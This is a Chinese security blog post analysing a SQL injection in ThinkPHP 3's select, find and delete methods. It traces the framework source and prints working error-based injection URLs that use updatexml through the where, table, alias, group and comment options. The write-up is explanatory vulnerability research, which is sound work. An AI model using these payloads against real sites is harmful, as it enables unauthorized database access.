<!DOCTYPE html>
<html>
  <!DOCTYPE html>
<html lang="en">
<head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  
  <title>TP3 select/delete SQLI分析 - x1a0t&#39;s Blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
  
  <meta name="keywords" content=PHP,SQLI>
  
  
    <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=1.02">
  
  
    <link rel="alternate" href="/atom.xml " title="x1a0t&#39;s Blog" type="application/atom+xml">
  

  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 7.2.0"></head>
  <body>
    <div class="container">
      <header class="header">
  <div class="blog-title">
    <a href="/" class="logo">x1a0t&#39;s Blog</a>
    <div class="subtitle"></div>
  </div>
  <nav class="navbar">
    <ul class="menu">
      
        <li class="menu-item">
          <a href="/" class="menu-item-link">Home</a>
        </li>
      
        <li class="menu-item">
          <a href="/links" class="menu-item-link">Links</a>
        </li>
      
        <li class="menu-item">
          <a href="/notes" class="menu-item-link">Notes</a>
        </li>
      
        <li class="menu-item">
          <a href="/about" class="menu-item-link">About</a>
        </li>
      
    </ul>
  </nav>
</header>
<article class="post">
  <div class="post-title">
    <h1 class="article-title">TP3 select/delete SQLI分析</h1>
  </div>
   <div class="post-meta">
    <span class="post-time">2018-09-25</span>
    
      <ul class="post-tag-list" itemprop="keywords"><li class="post-tag-list-item"><a class="post-tag-list-link" href="/tags/PHP/" rel="tag">PHP</a></li><li class="post-tag-list-item"><a class="post-tag-list-link" href="/tags/SQLI/" rel="tag">SQLI</a></li></ul>
    
  </div>
  <div class="post-content">
    <p><a href="https://xz.aliyun.com/t/2629">大佬的文章</a> 已经写得很深刻了，我这里自己捋了一遍</p>
<h1 id="Ready"><a href="#Ready" class="headerlink" title="Ready"></a>Ready</h1><p>下载thinkphp最新版，切换到漏洞修补之前的版本</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/top-think/thinkphp</span><br><span class="line">git checkout 109bf30 </span><br></pre></td></tr></table></figure>

<p>创建数据库，更改&#x2F;ThinkPHP&#x2F;Conf&#x2F;convention.php中的数据库配置</p>
<h1 id="select-find注入"><a href="#select-find注入" class="headerlink" title="select|find注入"></a>select|find注入</h1><p>测试代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title class_">Home</span>\<span class="title class_">Controller</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">use</span> <span class="title">Think</span>\<span class="title">Controller</span>;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">IndexController</span> <span class="keyword">extends</span> <span class="title">Controller</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">index</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="variable">$id</span> = <span class="title function_ invoke__">I</span>(<span class="string">&#x27;get.id&#x27;</span>);</span><br><span class="line">        <span class="title function_ invoke__">M</span>(<span class="string">&#x27;users&#x27;</span>)-&gt;<span class="title function_ invoke__">where</span>(<span class="string">&#x27;1=1&#x27;</span>)-&gt;<span class="title function_ invoke__">select</span>(<span class="variable">$id</span>);</span><br><span class="line">        <span class="comment">//M(&#x27;users&#x27;)-&gt;where(&#x27;1=1&#x27;)-&gt;find($id);</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>有几种payload可通过报错注入注出数据，如下：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">where:http://127.0.0.1:4000/index.php?id[where]=1+and+updatexml(1,concat(0x7e,user()),1)</span><br><span class="line">table:http://127.0.0.1:4000/index.php?id[table]=users+where+1+and+updatexml(1,concat(0x7e,user()),1)%23</span><br><span class="line">alias:http://127.0.0.1:4000/index.php?id[alias]=where+1+and+updatexml(1,concat(0x7e,user()),1)%23</span><br></pre></td></tr></table></figure>

<p>进入代码查看select函数&#x2F;ThinkPHP&#x2F;Library&#x2F;Think&#x2F;Model.class.php:582</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">select</span>(<span class="params"><span class="variable">$options</span> = <span class="keyword">array</span>(<span class="params"></span>)</span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="variable">$pk</span> = <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">getPk</span>();</span><br><span class="line">    <span class="keyword">if</span> (<span class="title function_ invoke__">is_string</span>(<span class="variable">$options</span>) || <span class="title function_ invoke__">is_numeric</span>(<span class="variable">$options</span>)) &#123;</span><br><span class="line">        <span class="comment">// 根据主键查询</span></span><br><span class="line">        <span class="keyword">if</span> (<span class="title function_ invoke__">strpos</span>(<span class="variable">$options</span>, <span class="string">&#x27;,&#x27;</span>)) &#123;</span><br><span class="line">            <span class="variable">$where</span>[<span class="variable">$pk</span>] = <span class="keyword">array</span>(<span class="string">&#x27;IN&#x27;</span>, <span class="variable">$options</span>);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="variable">$where</span>[<span class="variable">$pk</span>] = <span class="variable">$options</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="variable">$options</span>          = <span class="keyword">array</span>();</span><br><span class="line">        <span class="variable">$options</span>[<span class="string">&#x27;where&#x27;</span>] = <span class="variable">$where</span>;</span><br><span class="line">    &#125; <span class="keyword">elseif</span> (<span class="title function_ invoke__">is_array</span>(<span class="variable">$options</span>) &amp;&amp; (<span class="title function_ invoke__">count</span>(<span class="variable">$options</span>) &gt; <span class="number">0</span>) &amp;&amp; <span class="title function_ invoke__">is_array</span>(<span class="variable">$pk</span>)) &#123;</span><br><span class="line">        <span class="comment">// 根据复合主键查询</span></span><br><span class="line">        <span class="variable">$count</span> = <span class="number">0</span>;</span><br><span class="line">        <span class="keyword">foreach</span> (<span class="title function_ invoke__">array_keys</span>(<span class="variable">$options</span>) <span class="keyword">as</span> <span class="variable">$key</span>) &#123;</span><br><span class="line">            <span class="keyword">if</span> (<span class="title function_ invoke__">is_int</span>(<span class="variable">$key</span>)) &#123;</span><br><span class="line">                <span class="variable">$count</span>++;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (<span class="title function_ invoke__">count</span>(<span class="variable">$pk</span>) == <span class="variable">$count</span>) &#123;</span><br><span class="line">            <span class="variable">$i</span> = <span class="number">0</span>;</span><br><span class="line">            <span class="keyword">foreach</span> (<span class="variable">$pk</span> <span class="keyword">as</span> <span class="variable">$field</span>) &#123;</span><br><span class="line">                <span class="variable">$where</span>[<span class="variable">$field</span>] = <span class="variable">$options</span>[<span class="variable">$i</span>];</span><br><span class="line">                <span class="keyword">unset</span>(<span class="variable">$options</span>[<span class="variable">$i</span>++]);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="variable">$options</span>[<span class="string">&#x27;where&#x27;</span>] = <span class="variable">$where</span>;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="keyword">elseif</span> (<span class="literal">false</span> === <span class="variable">$options</span>) &#123;</span><br><span class="line">        <span class="comment">// 用于子查询 不查询只返回SQL</span></span><br><span class="line">        <span class="variable">$options</span>[<span class="string">&#x27;fetch_sql&#x27;</span>] = <span class="literal">true</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 分析表达式</span></span><br><span class="line">    <span class="variable">$options</span> = <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">_parseOptions</span>(<span class="variable">$options</span>);</span><br></pre></td></tr></table></figure>

<p>我们传入的数组，系统会通过上面最后一行的<code>$this-&gt;_parseOptions($options)</code>去分析组合，跟进查看，同文件第680行</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">protected</span> <span class="function"><span class="keyword">function</span> <span class="title">_parseOptions</span>(<span class="params"><span class="variable">$options</span> = <span class="keyword">array</span>(<span class="params"></span>)</span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="title function_ invoke__">is_array</span>(<span class="variable">$options</span>)) &#123;</span><br><span class="line">        <span class="variable">$options</span> = <span class="title function_ invoke__">array_merge</span>(<span class="variable">$this</span>-&gt;options, <span class="variable">$options</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!<span class="keyword">isset</span>(<span class="variable">$options</span>[<span class="string">&#x27;table&#x27;</span>])) &#123;</span><br><span class="line">        <span class="comment">// 自动获取表名</span></span><br><span class="line">        <span class="variable">$options</span>[<span class="string">&#x27;table&#x27;</span>] = <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">getTableName</span>();</span><br><span class="line">        <span class="variable">$fields</span>           = <span class="variable language_">$this</span>-&gt;fields;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="comment">// 指定数据表 则重新获取字段列表 但不支持类型检测</span></span><br><span class="line">        <span class="variable">$fields</span> = <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">getDbFields</span>();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 数据表别名</span></span><br><span class="line">    <span class="keyword">if</span> (!<span class="keyword">empty</span>(<span class="variable">$options</span>[<span class="string">&#x27;alias&#x27;</span>])) &#123;</span><br><span class="line">        <span class="variable">$options</span>[<span class="string">&#x27;table&#x27;</span>] .= <span class="string">&#x27; &#x27;</span> . <span class="variable">$options</span>[<span class="string">&#x27;alias&#x27;</span>];</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 记录操作的模型名称</span></span><br><span class="line">    <span class="variable">$options</span>[<span class="string">&#x27;model&#x27;</span>] = <span class="variable language_">$this</span>-&gt;name;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 字段类型验证</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$options</span>[<span class="string">&#x27;where&#x27;</span>]) &amp;&amp; <span class="title function_ invoke__">is_array</span>(<span class="variable">$options</span>[<span class="string">&#x27;where&#x27;</span>]) &amp;&amp; !<span class="keyword">empty</span>(<span class="variable">$fields</span>) &amp;&amp; !<span class="keyword">isset</span>(<span class="variable">$options</span>[<span class="string">&#x27;join&#x27;</span>])) &#123;</span><br><span class="line">        <span class="comment">// 对数组查询条件进行字段类型检查</span></span><br><span class="line">        <span class="keyword">foreach</span> (<span class="variable">$options</span>[<span class="string">&#x27;where&#x27;</span>] <span class="keyword">as</span> <span class="variable">$key</span> =&gt; <span class="variable">$val</span>) &#123;</span><br><span class="line">            <span class="variable">$key</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$key</span>);</span><br><span class="line">            <span class="keyword">if</span> (<span class="title function_ invoke__">in_array</span>(<span class="variable">$key</span>, <span class="variable">$fields</span>, <span class="literal">true</span>)) &#123;</span><br><span class="line">                <span class="keyword">if</span> (<span class="title function_ invoke__">is_scalar</span>(<span class="variable">$val</span>)) &#123;</span><br><span class="line">                    <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">_parseType</span>(<span class="variable">$options</span>[<span class="string">&#x27;where&#x27;</span>], <span class="variable">$key</span>);</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 查询过后清空sql表达式组装 避免影响下次查询</span></span><br><span class="line">    <span class="variable language_">$this</span>-&gt;options = <span class="keyword">array</span>();</span><br><span class="line">    <span class="comment">// 表达式过滤</span></span><br><span class="line">    <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">_options_filter</span>(<span class="variable">$options</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="variable">$options</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在第一个判断，代码就将我们传入<code>$options</code>和系统中已经存在的<code>$this-&gt;options</code>合并了，然后经过这里的一部分处理后，后面会进入各种parseXXX的相应处理，最终组装成SQL语句，代码&#x2F;ThinkPHP&#x2F;Library&#x2F;Think&#x2F;Db&#x2F;Driver.class.php:1096</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">parseSql</span>(<span class="params"><span class="variable">$sql</span>, <span class="variable">$options</span> = <span class="keyword">array</span>(<span class="params"></span>)</span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="variable">$sql</span> = <span class="title function_ invoke__">str_replace</span>(</span><br><span class="line">        <span class="keyword">array</span>(<span class="string">&#x27;%TABLE%&#x27;</span>, <span class="string">&#x27;%DISTINCT%&#x27;</span>, <span class="string">&#x27;%FIELD%&#x27;</span>, <span class="string">&#x27;%JOIN%&#x27;</span>, <span class="string">&#x27;%WHERE%&#x27;</span>, <span class="string">&#x27;%GROUP%&#x27;</span>, <span class="string">&#x27;%HAVING%&#x27;</span>, <span class="string">&#x27;%ORDER%&#x27;</span>, <span class="string">&#x27;%LIMIT%&#x27;</span>, <span class="string">&#x27;%UNION%&#x27;</span>, <span class="string">&#x27;%LOCK%&#x27;</span>, <span class="string">&#x27;%COMMENT%&#x27;</span>, <span class="string">&#x27;%FORCE%&#x27;</span>),</span><br><span class="line">        <span class="keyword">array</span>(</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">parseTable</span>(<span class="variable">$options</span>[<span class="string">&#x27;table&#x27;</span>]),</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">parseDistinct</span>(<span class="keyword">isset</span>(<span class="variable">$options</span>[<span class="string">&#x27;distinct&#x27;</span>]) ? <span class="variable">$options</span>[<span class="string">&#x27;distinct&#x27;</span>] : <span class="literal">false</span>),</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">parseField</span>(!<span class="keyword">empty</span>(<span class="variable">$options</span>[<span class="string">&#x27;field&#x27;</span>]) ? <span class="variable">$options</span>[<span class="string">&#x27;field&#x27;</span>] : <span class="string">&#x27;*&#x27;</span>),</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">parseJoin</span>(!<span class="keyword">empty</span>(<span class="variable">$options</span>[<span class="string">&#x27;join&#x27;</span>]) ? <span class="variable">$options</span>[<span class="string">&#x27;join&#x27;</span>] : <span class="string">&#x27;&#x27;</span>),</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">parseWhere</span>(!<span class="keyword">empty</span>(<span class="variable">$options</span>[<span class="string">&#x27;where&#x27;</span>]) ? <span class="variable">$options</span>[<span class="string">&#x27;where&#x27;</span>] : <span class="string">&#x27;&#x27;</span>),</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">parseGroup</span>(!<span class="keyword">empty</span>(<span class="variable">$options</span>[<span class="string">&#x27;group&#x27;</span>]) ? <span class="variable">$options</span>[<span class="string">&#x27;group&#x27;</span>] : <span class="string">&#x27;&#x27;</span>),</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">parseHaving</span>(!<span class="keyword">empty</span>(<span class="variable">$options</span>[<span class="string">&#x27;having&#x27;</span>]) ? <span class="variable">$options</span>[<span class="string">&#x27;having&#x27;</span>] : <span class="string">&#x27;&#x27;</span>),</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">parseOrder</span>(!<span class="keyword">empty</span>(<span class="variable">$options</span>[<span class="string">&#x27;order&#x27;</span>]) ? <span class="variable">$options</span>[<span class="string">&#x27;order&#x27;</span>] : <span class="string">&#x27;&#x27;</span>),</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">parseLimit</span>(!<span class="keyword">empty</span>(<span class="variable">$options</span>[<span class="string">&#x27;limit&#x27;</span>]) ? <span class="variable">$options</span>[<span class="string">&#x27;limit&#x27;</span>] : <span class="string">&#x27;&#x27;</span>),</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">parseUnion</span>(!<span class="keyword">empty</span>(<span class="variable">$options</span>[<span class="string">&#x27;union&#x27;</span>]) ? <span class="variable">$options</span>[<span class="string">&#x27;union&#x27;</span>] : <span class="string">&#x27;&#x27;</span>),</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">parseLock</span>(<span class="keyword">isset</span>(<span class="variable">$options</span>[<span class="string">&#x27;lock&#x27;</span>]) ? <span class="variable">$options</span>[<span class="string">&#x27;lock&#x27;</span>] : <span class="literal">false</span>),</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">parseComment</span>(!<span class="keyword">empty</span>(<span class="variable">$options</span>[<span class="string">&#x27;comment&#x27;</span>]) ? <span class="variable">$options</span>[<span class="string">&#x27;comment&#x27;</span>] : <span class="string">&#x27;&#x27;</span>),</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">parseForce</span>(!<span class="keyword">empty</span>(<span class="variable">$options</span>[<span class="string">&#x27;force&#x27;</span>]) ? <span class="variable">$options</span>[<span class="string">&#x27;force&#x27;</span>] : <span class="string">&#x27;&#x27;</span>),</span><br><span class="line">        ), <span class="variable">$sql</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="variable">$sql</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>也就是由于我们可以控制整个<code>$options</code>，然后像大佬说的上面代码中任何的<code>parseXXX</code>都有可能是注入点</p>
<p>这里我也只分析当前文件的几个注入点，<code>$options[&#39;table&#39;]</code>是直接使用的我们传入的内容，根据下面的代码可知，我们无法获取到表前缀的情况就无法使用</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (!<span class="keyword">isset</span>(<span class="variable">$options</span>[<span class="string">&#x27;table&#x27;</span>])) &#123;</span><br><span class="line">    <span class="comment">// 自动获取表名</span></span><br><span class="line">    <span class="variable">$options</span>[<span class="string">&#x27;table&#x27;</span>] = <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">getTableName</span>();</span><br><span class="line">    <span class="variable">$fields</span>           = <span class="variable language_">$this</span>-&gt;fields;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="comment">// 指定数据表 则重新获取字段列表 但不支持类型检测</span></span><br><span class="line">    <span class="variable">$fields</span> = <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">getDbFields</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>如果<code>$options[&#39;alias&#39;]</code>存在时，就直接拼接到表名的后面</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 数据表别名</span></span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">empty</span>(<span class="variable">$options</span>[<span class="string">&#x27;alias&#x27;</span>])) &#123;</span><br><span class="line">    <span class="variable">$options</span>[<span class="string">&#x27;table&#x27;</span>] .= <span class="string">&#x27; &#x27;</span> . <span class="variable">$options</span>[<span class="string">&#x27;alias&#x27;</span>];</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>而<code>$options[&#39;where&#39;]</code>则需要经过字段名和字段类型的检验，但我们可控的还有$val</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">foreach</span> (<span class="variable">$options</span>[<span class="string">&#x27;where&#x27;</span>] <span class="keyword">as</span> <span class="variable">$key</span> =&gt; <span class="variable">$val</span>) &#123;</span><br><span class="line">    <span class="variable">$key</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$key</span>);</span><br><span class="line">    <span class="keyword">if</span> (<span class="title function_ invoke__">in_array</span>(<span class="variable">$key</span>, <span class="variable">$fields</span>, <span class="literal">true</span>)) &#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="title function_ invoke__">is_scalar</span>(<span class="variable">$val</span>)) &#123;</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">_parseType</span>(<span class="variable">$options</span>[<span class="string">&#x27;where&#x27;</span>], <span class="variable">$key</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>上面的几个点，最后经过parseXXX处理后，恶意代码仍然保留，导致注入，find函数的流程程基本和上面类似，略过</p>
<h1 id="delelte注入"><a href="#delelte注入" class="headerlink" title="delelte注入"></a>delelte注入</h1><p>测试代码如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title class_">Home</span>\<span class="title class_">Controller</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">use</span> <span class="title">Think</span>\<span class="title">Controller</span>;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">IndexController</span> <span class="keyword">extends</span> <span class="title">Controller</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">index</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="variable">$id</span> = <span class="title function_ invoke__">I</span>(<span class="string">&#x27;get.id&#x27;</span>);</span><br><span class="line">        <span class="comment">//M(&#x27;users&#x27;)-&gt;where(&#x27;1=1&#x27;)-&gt;select($id);</span></span><br><span class="line">        <span class="title function_ invoke__">M</span>(<span class="string">&#x27;users&#x27;</span>)-&gt;<span class="title function_ invoke__">where</span>(<span class="string">&#x27;1=1&#x27;</span>)-&gt;<span class="title function_ invoke__">delete</span>(<span class="variable">$id</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>delete基本也差不多，但是在分析完表达式后，有一个判断，我们必须保证<code>$options[&#39;where&#39;]</code>不为空才行</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$options</span> = <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">_parseOptions</span>(<span class="variable">$options</span>);</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">empty</span>(<span class="variable">$options</span>[<span class="string">&#x27;where&#x27;</span>])) &#123;</span><br><span class="line">    <span class="comment">// 如果条件为空 不进行删除操作 除非设置 1=1</span></span><br><span class="line">    <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>给出delete时的payload:</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">where:http://127.0.0.1:4000/index.php?id[where]=1+and+updatexml(1,concat(0x7e,user()),1)</span><br><span class="line">table:http://127.0.0.1:4000/index.php?id[table]=users+where+1+and+updatexml(1,concat(0x7e,user()),1)%23&amp;id[where]=1%3d1</span><br><span class="line">http://127.0.0.1:4000/index.php?id[alias]=where+1+and+updatexml(1,concat(0x7e,user()),1)%23&amp;id[where]=1%3d1</span><br></pre></td></tr></table></figure>

<h1 id="补充"><a href="#补充" class="headerlink" title="补充"></a>补充</h1><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[group]http://127.0.0.1:4000/index.php?id[group]=(updatexml(0,concat(0x7e,user()),1))</span><br><span class="line">[comment]http://127.0.0.1:4000/index.php?id[comment]=*/and+updatexml(0,concat(0x7e,user()),1)/*</span><br></pre></td></tr></table></figure>

<h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><p><a href="https://xz.aliyun.com/t/2631">https://xz.aliyun.com/t/2631</a><br><a href="https://xz.aliyun.com/t/2630">https://xz.aliyun.com/t/2630</a></p>

  </div>
  <div class="post-footer">
    <a href="#top" class="top">Post.Top</a>
  </div>
</article>
<footer>
  &copy; 2024
  <span class="author">
    x1a0t
  </span>
</footer>
    </div>
  </body>
</html>